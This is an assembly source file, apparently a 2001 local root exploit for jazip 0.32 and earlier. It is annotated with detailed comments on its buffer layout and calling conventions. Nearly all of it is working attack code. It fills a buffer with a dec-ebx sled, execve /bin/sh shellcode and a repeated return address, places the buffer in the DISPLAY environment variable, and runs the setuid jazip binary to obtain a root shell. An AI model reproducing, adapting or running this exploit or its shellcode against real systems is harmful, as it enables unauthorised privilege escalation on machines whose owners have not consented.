; -   q u i c k .  a n d  .  d i r t y ! @ * $  -
;    _         _                    _     _ _
;   |_|___ ___|_|___    ___ _ _ ___| |___|_| |_
;   | | .'|- _| | . |  | -_|_'_| . | | . | |  _|
;  _| |__,|___|_|  _|  |___|_,_|  _|_|___|_|_|
; |___|         |_|            |_|
; 
;    Created date    : 2001-09-05
;    Author          : teleh0r
;    Description     : simple buffer overflow exploit.
;                    
;  compile with: nasm -f elf jazip-exploit.asm -o x.o
;  gcc x.o -o jazip-exploit
;
; written due to serious bored0m - since I am leaving
; digit-labs I would like to wish all the members
; good luck in the future.

; Layout constants for the buffer assembled in main (lengths in bytes).
%define buf_size  0x837                 ; 2103: size of `buffer` (.bss) and of the content written into it
%define nop_len   0x7bb                 ; 1979: pad-region length; equals buf_size-sc_len-ret_len
                                        ; (main spells out that expression; this name itself is unreferenced)
%define dec_ebx   0x4b                  ; memset fill byte for the pad region; 0x4b is the one-byte encoding of `dec ebx`
%define ret_len   0x64                  ; 100: bytes appended by main's strcat loop (0x19 = 25 copies of the 4-byte s_eip)

segment .text
;;;;;;;;;;;;;

; libc functions doing da work.
; All are reached through the 32-bit cdecl convention: arguments are pushed
; right-to-left and the caller pops them afterwards (see the `add esp` lines
; in main). Nothing here is position-independent; symbols are absolute.

extern puts
extern printf
extern memset
extern memcpy
extern setenv
extern strcat
extern system


	global main	
main:
	;---------------------------------------------------------------
	; int main(void)  -  32-bit cdecl, ELF i386
	;
	; Fills `buffer` (.bss, buf_size bytes) with three regions:
	;   [buf_size-sc_len-ret_len bytes of dec_ebx]   0x7bb = 1979
	;   [sc_len bytes copied from shellcode]         0x18  =   24
	;   [0x19 copies of the 4-byte s_eip via strcat] 0x64  =  100
	;                                                -------------
	;                                                0x837 = 2103
	; then stores it as the DISPLAY environment variable (setenv,
	; overwrite=1) and runs `path` through system().
	;
	; Returns: eax as left by system() (no explicit result is set).
	; Registers: edi is the strcat loop counter. ebx/esi/edi are pushed
	;   below but never popped - `leave` discards the saved copies, so
	;   the callee-saved registers are not restored for the caller.
	; Stack: after printf only 4 of the 8 pushed bytes are popped and
	;   the argument to system() is never popped; esp stays skewed until
	;   `leave` resets it from ebp. Later calls are unaffected because
	;   each pushes its own arguments.
	;---------------------------------------------------------------

	; prologue - set up the frame and save callee-saved registers
	; (saved copies are never popped; see header note)

	push ebp
	mov  ebp, esp
	push ebx
	push esi
	push edi

	; banner: puts(msg1); puts(msg2); printf(msg3, sc_len)

	push dword msg1
	call puts
	add  esp, 0x04

	push dword msg2
        call puts
        add  esp, 0x04

	push dword sc_len                 ; sc_len is an absolute constant (24), resolved from .data
	push dword msg3
	call printf
	add  esp, 0x04                    ; NOTE: two dwords were pushed, only one is popped
	
	; pad region: memset(buffer, dec_ebx, buf_size-sc_len-ret_len)
	; length evaluates to 0x7bb (1979), the same value as the unused nop_len define

	push dword buf_size-sc_len-ret_len
	push dword dec_ebx
	push dword buffer
	call memset 
	add  esp, 0x0c	

	; shellcode region: memcpy(buffer + 0x7bb, shellcode, 0x18)
	; 0x18 = 24 = sc_len, i.e. the 25 declared shellcode bytes minus the trailing 0x00

	push dword 0x18
	push dword shellcode
	push dword buffer
	pop  eax                          ; eax = buffer (push/pop pair used as a mov)
	add  eax, buf_size-sc_len-ret_len ; eax = buffer + 1979, first byte after the pad
	push eax
	call memcpy
	add  esp, 0x0c

	; return-address region: strcat(buffer, s_eip) repeated 0x19 = 25 times
	; The bytes after the memcpy region are still zero (.bss), so the first
	; strcat appends at offset 2003; 25 * 4 = 100 bytes brings the content to
	; exactly buf_size (2103). The final terminating NUL is written at
	; buffer[buf_size], one byte past the .bss reservation.

	mov edi, 0x19                     ; edi = iterations remaining

	fun_loop:

	push dword s_eip
	push dword buffer
	call strcat 
	add  esp, 8
	dec  edi

	jnz  fun_loop
	
	; setenv(env, buffer, 1): publish the buffer as DISPLAY, overwriting any existing value

        push dword 0x01
        push dword buffer
        push dword env
        call setenv
        add  esp, 0x0c

	; system(path): run the target with the modified environment
	; (the pushed argument is never popped; `leave` below absorbs it)

	push dword path
        call system
	
	; epilogue: esp = ebp, pop ebp; eax (system's return) becomes main's result

	leave
	ret

segment .data
;;;;;;;;;;;;;

; NUL-terminated strings for the banner (puts) and the length line
; (printf with a single %i argument, fed sc_len in main).
msg1 db "1ocal root exploit for jazip v.0.32 and prior",  0x00
msg2 db "copyright (c) 2001 by <teleh0r@digit-labs.org>", 0x0a,0x00
msg3 db "shellcode length: %i", 0x0a, 0x00

env   db "DISPLAY", 0x00                ; environment variable name passed to setenv in main
path  db "/usr/X11R6/bin/jazip", 0x00   ; command string passed to system() in main
s_eip db 0xe8, 0xf9, 0xff, 0xbf, 0x00   ; 4-byte little-endian value 0xbffff9e8 plus a NUL so
                                        ; strcat can append it; main appends it 0x19 = 25 times
	
; 24 bytes PIC execve shellcode by myself
; 25 bytes are declared; the last (0x00) is a terminator and is excluded
; from sc_len below, which is why main copies 0x18 bytes.
; NOTE(review): the first three `db` lines end in a trailing comma -
; confirm the assembler version in use accepts that form.

shellcode db 0x31,0xc0,0x99,0x52,0x68,0x2f,0x2f,
          db 0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
          db 0x89,0xe3,0x52,0x53,0x89,0xe1,0xb0,
          db 0x0b,0xcd,0x80,0x00

sc_len equ $ - shellcode - 1            ; = 24 (0x18): declared shellcode bytes minus the trailing 0x00

segment .bss
;;;;;;;;;;;;

; Zero-initialized staging buffer filled by main. Exactly buf_size (0x837 =
; 2103) bytes are reserved and exactly 2103 bytes of content are written
; (1979 pad + 24 shellcode + 25 * 4 s_eip), so the terminating NUL of the
; last strcat lands at buffer[buf_size], one byte past this reservation;
; nothing else is declared in .bss after it.
buffer resb buf_size

